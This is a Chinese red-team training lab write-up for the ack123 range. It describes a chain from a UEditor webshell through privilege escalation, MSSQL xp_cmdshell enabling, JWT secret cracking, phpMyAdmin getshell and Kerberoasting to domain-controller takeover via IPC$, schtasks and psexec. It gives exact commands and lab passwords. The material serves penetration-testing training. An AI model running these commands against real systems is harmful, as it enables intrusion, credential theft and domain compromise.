九月红队考核 ack123靶场 第四篇

九月红队考核ack123靶场第四篇

暗月渗透测试培训出师靶场的第四篇九月出师人数共七人共七篇文章目前第四篇

1.站库分离 外网打点
2.过360全家桶
3.过windwos defender
4.过火绒
5.内网漫游
6.多层网络渗透
7.横向渗透
8.jwt token密钥破解
9.权限提升
10.域渗透
11.phpmyadmin写shell
12.sqlserver 提权
每三个月一次考核，每个项目根据当前流行的技术进行适当的调整。
项目综合考核渗透测试能力，培养单兵作战的安全选手。

修改本地hosts访问目标即可开始www.ackmoon.com

首页发现是hdhcms

想到的做法有：

1.尝试网上公开hdhcms的漏洞。
2.下载源码进行代码审计

3.可以正常注册登录，可以进行渗透测试，挖掘漏洞尝试getshell

在页面进行浏览时发现存在编辑器，版本为ueditor1.4.3，想到网上有该编辑器漏洞

利用方式如下网络公开复现文章：

https://blog.csdn.net/u011966339/article/details/82980009

至此拿到第一个webshell

发现不是最高权限。想上cs进行后续操作，查看进程发现存在360全家桶

需要做免杀，免杀是问朋友的，所以不放出来了。

成功上线cs

发现权限不高，尝试梼杌插件自带的提权插件，失败，猜测是被杀软拦截了。想到哥斯拉有自带的sweetpotato有免杀功能，进行尝试，提权成功。

在c盘下翻看文件，发现flag

至此web1应该是完整打完了。

查看网站根目录寻找网站配置文件，

发现是站库分离。使用cs自带的socks代理内网，用Navicat工具连接数据库，可以成功连接。

1433端口开放mssql数据库，可以尝试xp_cmdshell执行命令。xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。

启用：

EXEC sp_configure'show advanced options', 1RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;

执行：

EXECmaster.dbo.xp_cmdshell '命令'

发现可以执行命令，使用windows自带下载命令certutil对文件进行编码上传。

然后进行执行拿到data1的权限

常规操作可以翻看文件查找flag，第二个flag

flag{41e0bc81ac9fd3ed0ac4e69940767491}

拿到data1的权限后进行内网扫描，发现192.168.22.168开放80端口。访问后发现是jwt

页面提示默认账号密码都是demo，使用demo进行登录抓包，发现存在token，是jwt加密后的

使用jwt_tool对秘钥进行解密，发现秘钥为Qweasdzxc5。有秘钥后可以尝试伪造用户进行登录，想到越权登录admin账号，越权后发现一片空白，并没有其他可以尝试getshell的功能。

询问月师傅。

本地搭建phpstudy安装phpmyadmin发现phpmyadmin版本为4.8.5

进行访问http://192.168.22.168/phpMyAdmin4.8.5

使用jwt破解出来的密码进行登录。Phpmyadmin后台getshell的方法很多，可以参考

https://xz.aliyun.com/t/3283

成功getshell

Ping114.114.114.114发现web2不出网，不能反向连接到我的cs，所以想到正向连接。

Cs正反向连接可以参考

https://blog.csdn.net/qq_42094992/article/details/115087045

查看tasklist发现没有杀软，直接使用cs生成正向木马进行上传。然后连接成功上线。

对web2进行信息收集，发现存在域环境，域为ack123，域控为10.10.10.135

尝试以下做法。

hashdump抓到的hash解密是QWEasd.999，是本地管理密码。

mimikatz抓不到明文，有几个hash，尝试hash传递失败。

steal_token窃取ack23/web2用户后也无法访问域控

mimikatz导出票据后，尝试破解，也破解不出（可能是字典小）。

没办法了去请教月师傅

月师傅这思路也太骚了，谁能想到用这个字典啊。哈哈哈

成功解密出域控密码为P@55w0rd!

破解密码的方法：使用mimikatz

mimikatz.exe"standard::base64""kerberos::list/export"，进行导出票据

破解服务票据

使用tgsrepcrack

工具下载地址：https://github.com/nidem/kerberoast

执行

python tgsrepcrack.py /root/passwd.txt PENTESTLAB_001.kirbi

拿到域控的密码就开始尝试ipc连接然后上传木马，设置计划任务进行执行。

使用ipc连接

net use\10.10.10.135ipc$ /user:administrator "P@55w0rd!"

上传木马

shell copyC:phpstudy_proWWWa4321.exe \10.10.10.135c$a4321.exe

查看文件是否上传成功

shell dir\10.10.10.135c$

查看进行

shell tasklist /svc/S 10.10.10.135 /U administrator /P P@55w0rd!

设置计划任务定时执行

shell SCHTASKS/Create /S 16server-dc1.ack123.com /U Administrator /P "P@55w0rd!"/SC ONCE /ST 14:32:42 /TN 361 /TR c:bn.exe /RU Administrator

立即运行

shell schtasks /run/s 10.10.10.135 /i /tn 257 /U Administrator /P "P@55w0rd!"

查看计划任务

shell schtasks /S10.10.10.135 /U administrator /P P@55w0rd!

尝试了很长时间都无法上线，不知道是啥原因，可能是菜吧。

回头想其他办法，想到有域控的明文密码并且域控是开放445端口的，所以可以尝试psexec进行横向。

使用cs自带插件

首先设置smb监听

执行后可以成功上线。

同样的方法可以data2上线，至此这个靶场已经完整的拿下了。

本文始发于微信公众号（moonsec）：九月红队考核 ack123靶场 第四篇